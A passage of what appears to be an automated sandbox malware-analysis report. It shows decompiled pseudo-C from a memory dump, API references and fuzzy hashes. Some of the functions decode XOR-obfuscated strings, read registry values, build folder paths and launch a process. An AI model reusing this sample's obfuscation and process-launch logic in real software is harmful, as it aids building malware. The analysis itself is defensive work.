					_t108 = _t108 + 1;
				} while (_t108 < 0x65);
				_t109 =  &_v156;
				_v55 = 0;
				_t115 = _t129 - _t109;
				do {
					_t74 =  *_t109;
					 *((char*)(_t115 + _t109)) = _t74;
					_t109 = _t109 + 1;
				} while (_t74 != 0);
				_t92 = 0x62;
				_v291 = 0;
				_v291 = 0;
				_v292 = _t92 ^ 0x00000040;
				lstrcatA(_t129,  &_v292);
				lstrcatA(_t129, _v284);
				_v291 = 0;
				_v292 = _t92 ^ 0x00000040;
				_v291 = 0;
				lstrcatA(_t129,  &_v292);
				_t123 = 0x44;
				E00E8D0F0(_t123,  &_v260, 0, _t123);
				_v260.cb = _t123;
				_v260.lpDesktop = 0xea99c0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA(_v280, _t129, 0, 0, 0, 0, 0, 0,  &_v260,  &_v276);
				return E00E8AE43(_v48 ^ _t134 + 0x0000000c);
			}

0x00e84a91
0x00e84a97
0x00e84a9e
0x00e84ab6
0x00e84aba
0x00e84ac4
0x00e84ac9
0x00e84acf
0x00e84ad5
0x00e84ade
0x00e84ae0
0x00e84ae7
0x00e84ae9
0x00e84aee
0x00e84af9
0x00e84b04
0x00e84b0e
0x00e84b0e
0x00e84b11
0x00e84b15
0x00e84b16
0x00e84b27
0x00e84b2f
0x00e84b33
0x00e84b3a
0x00e84b44
0x00e84b4e
0x00e84b52
0x00e84b54
0x00e84b5f
0x00e84b64
0x00e84b69
0x00e84b6b
0x00e84b6d
0x00e84b6d
0x00e84b6f
0x00e84b70
0x00e84b74
0x00e84b76
0x00e84b76
0x00e84b79
0x00e84b79
0x00e84b7c
0x00e84b7d
0x00e84b83
0x00e84b86
0x00e84b8d
0x00e84b8d
0x00e84b8f
0x00e84b94
0x00e84b9b
0x00e84ba2
0x00e84ba7
0x00e84bac
0x00e84bb1
0x00e84bb8
0x00e84bba
0x00e84bc3
0x00e84bca
0x00e84bcc
0x00e84bd4
0x00e84bdf
0x00e84be6
0x00e84bee
0x00e84bf8
0x00e84bff
0x00e84c07
0x00e84c0e
0x00e84c16
0x00e84c1d
0x00e84c25
0x00e84c25
0x00e84c28
0x00e84c2f
0x00e84c30
0x00e84c35
0x00e84c3c
0x00e84c48
0x00e84c4a
0x00e84c4a
0x00e84c4c
0x00e84c4f
0x00e84c50
0x00e84c56
0x00e84c59
0x00e84c60
0x00e84c65
0x00e84c6f
0x00e84c76
0x00e84c7b
0x00e84c84
0x00e84c8c
0x00e84c90
0x00e84c94
0x00e84c9c
0x00e84ca1
0x00e84cab
0x00e84cb3
0x00e84cb7
0x00e84cb8
0x00e84cb9
0x00e84ccf
0x00e84ced

APIs

Part of subcall function 00E82861: RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00E828DC

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000,00000000,770BE3A0,?,?), ref: 00E84ADE
lstrcatA.KERNEL32(00000000,?), ref: 00E84B2F
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000), ref: 00E84B52
lstrcatA.KERNEL32(00000000,?,?), ref: 00E84B9B
lstrcatA.KERNEL32(00000000,?), ref: 00E84C6F
lstrcatA.KERNEL32(00000000,?), ref: 00E84C76
lstrcatA.KERNEL32(00000000,?), ref: 00E84C90
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00E84CCF

Strings

#4 s, xrefs: 00E84AEE
F8A/, xrefs: 00E84A97
Tett, xrefs: 00E84CAB

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcat$FolderPath$CreateOpenProcess
String ID: #4 s$F8A/$Tett
API String ID: 2997047404-3104265941
Opcode ID: 9fcdca8c6596f23f0964778ec77774dc138cdb435e432dfee20199ed6c07dd10
Instruction ID: cdbd1ed9457029d4c9932ee1d666b9159cfe745f481b3010c72e80c7c2e6ceac
Opcode Fuzzy Hash: 9fcdca8c6596f23f0964778ec77774dc138cdb435e432dfee20199ed6c07dd10
Instruction Fuzzy Hash: D161086140C3859EE321DF39DC41BABBBE8EFD9308F00591DF5CCA6162EB7095898762

Uniqueness

Uniqueness Score: -1.00%

Function 00E9B36D, Relevance: 18.4, APIs: 12, Instructions: 375
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00E9B36D(char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				intOrPtr* _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t234 = E00E998AF(1, 0x50);
					_v8 = _t234;
					E00E964B8(0);
					if(_t234 != 0) {
						_t227 = E00E998AF(1, 4);
						_v12 = _t227;
						E00E964B8(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0xea90c0, _t212 << 2);
								L24:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L26;
							}
							_t232 = E00E998AF(1, 4);
							_v16 = _t232;
							E00E964B8(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E00E9EDC5(_t209,  *((intOrPtr*)(_t209 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E00E9EDC5(_t209,  *((intOrPtr*)(_t209 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E00E9EDC5(_t209,  *((intOrPtr*)(_t209 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E00E9EDC5(_t209, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E00E9EDC5(_t209, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E00E9EDC5(_t209, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E00E9EDC5(_t209, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E00E9EDC5(_t209, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
								_t245 = _t244 | E00E9EDC5(_t209, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
								_t246 = _t245 | E00E9EDC5(_t209, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
								_t247 = _t246 | E00E9EDC5(_t209, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E00E9EDC5(_t209, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E00E9EDC5(_t209, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E00E9EDC5(_t209, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E00E9EDC5(_t209, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E00E9EDC5(_t209, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E00E9EDC5(_t209, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E00E9EDC5(_t209, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E00E9EDC5(_t209, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E00E9EDC5(_t209, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E00E9EDC5(_t209, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while(1) {
										_t195 =  *_t226;
										if(_t195 == 0) {
											break;
										}
										_t61 = _t195 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t195 != 0x3b) {
												L16:
												_t226 = _t226 + 1;
												continue;
											}
											_t257 = _t226;
											do {
												_t196 = _t257 + 1;
												_t222 =  *_t196;
												 *_t257 = _t222;
												_t257 = _t196;
											} while (_t222 != 0);
											continue;
										}
										 *_t226 = _t221;
										goto L16;
									}
									goto L24;
								}
								E00E9B26F(_v8);
								E00E964B8(_v8);
								E00E964B8(_v12);
								E00E964B8(_v16);
								goto L4;
							}
							E00E964B8(_t234);
							E00E964B8(_v12);
							L7:
							goto L4;
						}
						E00E964B8(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0xea90c0;
					L26:
					_t105 =  *(_t209 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E00E964B8( *(_t209 + 0x88));
							E00E964B8( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t231;
					 *(_t209 + 0x88) = _t236;
					return 0;
				}
			}

0x00e9b376
0x00e9b37d
0x00e9b380
0x00e9b383
0x00e9b38c
0x00e9b3ae
0x00e9b3b2
0x00e9b3b5
0x00e9b3bf
0x00e9b3d2
0x00e9b3d6
0x00e9b3d9
0x00e9b3e3
0x00e9b3f5
0x00e9b688
0x00e9b689
0x00e9b68b
0x00e9b693
0x00e9b697
0x00e9b69c
0x00e9b6a7
0x00e9b6b3
0x00e9b6bf
0x00e9b6cb
0x00e9b6d1
0x00e9b6d5
0x00e9b6d7
0x00e9b6d7
0x00000000
0x00e9b6d5
0x00e9b404
0x00e9b408
0x00e9b40b
0x00e9b415
0x00e9b429
0x00e9b42f
0x00e9b444
0x00e9b458
0x00e9b46f
0x00e9b489
0x00e9b491
0x00e9b4a3
0x00e9b4ba
0x00e9b4d1
0x00e9b4eb
0x00e9b502
0x00e9b519
0x00e9b530
0x00e9b54a
0x00e9b561
0x00e9b578
0x00e9b58f
0x00e9b5a9
0x00e9b5c0
0x00e9b5d7
0x00e9b5ee
0x00e9b608
0x00e9b624
0x00e9b652
0x00e9b661
0x00e9b661
0x00e9b665
0x00000000
0x00000000
0x00e9b656
0x00e9b656
0x00e9b65c
0x00e9b66b
0x00e9b660
0x00e9b660
0x00000000
0x00e9b660
0x00e9b66d
0x00e9b66f
0x00e9b66f
0x00e9b672
0x00e9b674
0x00e9b676
0x00e9b678
0x00000000
0x00e9b67c
0x00e9b65e
0x00000000
0x00e9b65e
0x00000000
0x00e9b667
0x00e9b62a
0x00e9b630
0x00e9b639
0x00e9b642
0x00000000
0x00e9b647
0x00e9b418
0x00e9b421
0x00e9b3eb
0x00000000
0x00e9b3eb
0x00e9b3e6
0x00000000
0x00e9b3e6
0x00e9b3c1
0x00000000
0x00e9b396
0x00e9b396
0x00e9b398
0x00e9b39b
0x00e9b6d9
0x00e9b6d9
0x00e9b6e1
0x00e9b6e3
0x00e9b6e3
0x00e9b6eb
0x00e9b6f0
0x00e9b6f4
0x00e9b6fc
0x00e9b704
0x00e9b70a
0x00e9b6f4
0x00e9b70e
0x00e9b713
0x00e9b719
0x00000000
0x00e9b719

APIs

_free.LIBCMT ref: 00E9B3B5
_free.LIBCMT ref: 00E9B3D9
_free.LIBCMT ref: 00E9B3E6
_free.LIBCMT ref: 00E9B40B
_free.LIBCMT ref: 00E9B418
_free.LIBCMT ref: 00E9B421
_free.LIBCMT ref: 00E9B6FC
_free.LIBCMT ref: 00E9B704

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a7a91ea13c93c8fba4b951146c029773f40189979211eaff04aea1a75c6ad50e
Instruction ID: 2538616489943f56d2f7d934347ab1927f876f5d6c580e4c6172ee1da9343589
Opcode Fuzzy Hash: a7a91ea13c93c8fba4b951146c029773f40189979211eaff04aea1a75c6ad50e
Instruction Fuzzy Hash: 41C101B2D40204AFDF20DBA8DD82FEE77F8AB49744F145165FA05FB286D670E9409B60

Uniqueness

Uniqueness Score: -1.00%

Function 00EA1E73, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00EA1E73(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;

				_t263 = E00EA1BBB(__ecx,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t264 = _t263 | 0xffffffff;
				if(_v36 != _t264) {
					_t114 = E00E9B06B(_t188, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(_t114 != _t264) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t196 = 0;
						_t253 = E00EA1B26();
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E00E9AFB4(_t196,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v5 = _t241;
								_v48 = _t241;
								 *( *((intOrPtr*)(0xeaa6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0xeaa6c8 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v48, _t205 << 2);
									_t134 = E00EA18D1(_t189,  &_v48 + _t205 + _t205,  &_v48);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0xeaa6c8 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0xeaa6c8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0xeaa6c8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0xeaa6c8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0xeaa6c8 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v44;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t214 << 2);
											_t246 = E00EA1B26();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0xeaa6c8 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E00E95B87(GetLastError());
											 *( *((intOrPtr*)(0xeaa6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0xeaa6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E00E9B174( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E00EA1D37(_t204,  *_t189);
									__eflags = _t267;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E00E98BA1(__eflags);
									return _t267;
								}
							}
							_t271 = GetLastError();
							E00E95B87(_t271);
							 *( *((intOrPtr*)(0xeaa6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0xeaa6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(_t271 == 0) {
								 *((intOrPtr*)(E00E95BBD())) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0xeaa6c8 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00E95B87(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t238 << 2);
						_t196 = 0;
						_t253 = E00EA1B26();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00E95BAA()) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E00E95BBD())) = 0x18;
						goto L2;
					}
				} else {
					 *(E00E95BAA()) =  *_t186 & 0x00000000;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E00E95BBD()));
				}
			}

0x00ea1e96
0x00ea1e9a
0x00ea1e9b
0x00ea1e9b
0x00ea1e9d
0x00ea1ea3
0x00ea1ebe
0x00ea1ec3
0x00ea1ec6
0x00ea1ec8
0x00ea1eca
0x00ea1ee9
0x00ea1ef0
0x00ea1ef7
0x00ea1efa
0x00ea1f06
0x00ea1f09
0x00ea1f11
0x00ea1f12
0x00ea1f15
0x00ea1f15
0x00ea1f1c
0x00ea1f1e
0x00ea1f21
0x00ea1f29
0x00ea1f2c
0x00ea1f99
0x00ea1f9a
0x00ea1fa0
0x00ea1fa2
0x00ea1feb
0x00ea1fee
0x00ea1ff7
0x00ea1ffa
0x00ea1ffd
0x00ea1fff
0x00ea1fff
0x00ea1fff
0x00ea1ff0
0x00ea1ff3
0x00ea1ff3
0x00ea2004
0x00ea2007
0x00ea2013
0x00ea2018
0x00ea2024
0x00ea202e
0x00ea2032
0x00ea203c
0x00ea203f
0x00ea204a
0x00ea204f
0x00ea206e
0x00ea2071
0x00ea2075
0x00ea2076
0x00ea207c
0x00ea2081
0x00ea2084
0x00ea2086
0x00ea2088
0x00ea208d
0x00ea208f
0x00ea2091
0x00ea2094
0x00ea2096
0x00ea20b0
0x00ea20d4
0x00ea20d8
0x00ea20dc
0x00ea20de
0x00ea20e2
0x00ea20e4
0x00ea20ee
0x00ea20f1
0x00ea20f8
0x00ea20f8
0x00ea20f8
0x00ea20f8
0x00ea20e2
0x00ea20fd
0x00ea2109
0x00ea210b
0x00ea2196
0x00ea2196
0x00000000
0x00ea2111
0x00ea2111
0x00ea2115
0x00000000
0x00000000
0x00ea211a
0x00ea212c
0x00ea2134
0x00ea2137
0x00ea2138
0x00ea213b
0x00ea2142
0x00ea2147
0x00ea214a
0x00ea217e
0x00ea2188
0x00ea2188
0x00ea2192
0x00000000
0x00ea2192
0x00ea2153
0x00ea216c
0x00ea2173
0x00ea1f93
0x00000000
0x00ea1f93
0x00ea210b
0x00ea2098
0x00000000
0x00ea2051
0x00ea2058
0x00ea205b
0x00ea205d
0x00000000
0x00000000
0x00ea205f
0x00ea2061
0x00ea2061
0x00000000
0x00ea2067
0x00ea204f
0x00ea1faa
0x00ea1fad
0x00ea1fc8
0x00ea1fcd
0x00ea1fd3
0x00ea1fd5
0x00ea1fe0
0x00ea1fe0
0x00000000
0x00ea1fd5
0x00ea1f2e
0x00ea1f35
0x00ea1f37
0x00ea1f6e
0x00ea1f6e
0x00ea1f78
0x00ea1f7b
0x00ea1f82
0x00ea1f82
0x00ea1f82
0x00ea1f8e
0x00000000
0x00ea1f8e
0x00ea1f39
0x00ea1f3d
0x00000000
0x00000000
0x00ea1f3f
0x00ea1f4e
0x00ea1f53
0x00ea1f56
0x00ea1f57
0x00ea1f5a
0x00ea1f5a
0x00ea1f61
0x00ea1f63
0x00ea1f66
0x00ea1f69
0x00ea1f6c
0x00000000
0x00000000
0x00000000
0x00ea1ecc
0x00ea1ed1
0x00ea1ed4
0x00ea1edb
0x00000000
0x00ea1edb
0x00ea1ea5
0x00ea1eaa
0x00ea1eb0
0x00ea1eb2
0x00000000
0x00ea1eb7

APIs

Part of subcall function 00EA1B26: CreateFileW.KERNEL32(00000000,00000000,?,00EA1F1C,?,?,00000000,?,00EA1F1C,00000000,0000000C), ref: 00EA1B43

GetLastError.KERNEL32 ref: 00EA1F87
__dosmaperr.LIBCMT ref: 00EA1F8E
GetFileType.KERNEL32(00000000), ref: 00EA1F9A
GetLastError.KERNEL32 ref: 00EA1FA4
__dosmaperr.LIBCMT ref: 00EA1FAD
CloseHandle.KERNEL32(00000000), ref: 00EA1FCD
CloseHandle.KERNEL32(00E9892B), ref: 00EA211A
GetLastError.KERNEL32 ref: 00EA214C
__dosmaperr.LIBCMT ref: 00EA2153

Strings

H, xrefs: 00EA20D8

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 5fd4a7e4c58f8843c4a01a31d1934ee928647fc097a7a6884b526931523cbde1
Instruction ID: d0c6b9f132e5d620dcca4647eea6a28f4d7d92b02df804880328a5713dd13668
Opcode Fuzzy Hash: 5fd4a7e4c58f8843c4a01a31d1934ee928647fc097a7a6884b526931523cbde1
Instruction Fuzzy Hash: 8CA10332A042449FCF19DF68DC91BAE3BE1AF4B324F18119DE811BF2A1D735A816CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E8A313, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00E8A313(void* __ebx, void* __esi, CHAR* _a4) {
				signed int _v12;
				char _v247;
				char _v249;
				char _v253;
				char _v254;
				char _v258;
				char _v259;
				char _v263;
				char _v264;
				char _v272;
				char _v274;
				short _v276;
				intOrPtr _v280;
				char _v284;
				char _v285;
				char _v316;
				void* _v320;
				int _v324;
				signed int _t35;
				int* _t58;
				CHAR* _t64;
				signed int _t66;

				_t35 =  *0xea9014; // 0xa413846
				_v12 = _t35 ^ _t66;
				asm("movaps xmm0, [0xe7dbd0]");
				asm("movups [ebp-0x138], xmm0");
				asm("movaps xmm0, [0xe7dac0]");
				_t58 = 0;
				_t64 = _a4;
				asm("movups [ebp-0x128], xmm0");
				do {
					_t3 = _t58 + 0x40; // 0x40
					 *(_t66 + _t58 - 0x138) =  *(_t66 + _t58 - 0x138) ^ _t3;
					_t58 = _t58 + 1;
				} while (_t58 < 0x1f);
				_v285 = 0;
				if(RegOpenKeyExA(0x80000002,  &_v316, 0, 0x20119,  &_v320) == 0) {
					_v324 = 0x100;
					_v284 = 0x2b21200d;
					_t15 =  &_v284; // 0x2b21200d
					_v280 = 0x232b2d;
					_v276 = 0x2e203d;
					if(RegQueryValueExA(_v320, E00E827DA(_t15), 0, 0,  &_v272,  &_v324) == 0) {
						_t20 =  &_v284; // 0x2b21200d
						_push(_v247);
						_v264 = 0;
						_push( &_v253);
						_v259 = 0;
						_push( &_v258);
						_v254 = 0;
						_push( &_v263);
						_v249 = 0;
						_push( &_v272);
						_v284 = 0x30673265;
						_v280 = 0x34633661;
						_v276 = 0x2a6d;
						_v274 = 0;
						wsprintfA(_t64, E00E8282B(_t20));
						CharUpperBuffA(_t64, 0x17);
					}
					RegCloseKey(_v320);
				}
				return E00E8AE43(_v12 ^ _t66);
			}

0x00e8a31c
0x00e8a323
0x00e8a326
0x00e8a32e
0x00e8a337
0x00e8a33e
0x00e8a341
0x00e8a344
0x00e8a34b
0x00e8a34b
0x00e8a34e
0x00e8a355
0x00e8a356
0x00e8a361
0x00e8a382
0x00e8a38e
0x00e8a39f
0x00e8a3ac
0x00e8a3b2
0x00e8a3bc
0x00e8a3da
0x00e8a3e3
0x00e8a3e9
0x00e8a3f0
0x00e8a3f6
0x00e8a3fd
0x00e8a403
0x00e8a40a
0x00e8a410
0x00e8a417
0x00e8a41d
0x00e8a41e
0x00e8a428
0x00e8a432
0x00e8a43b
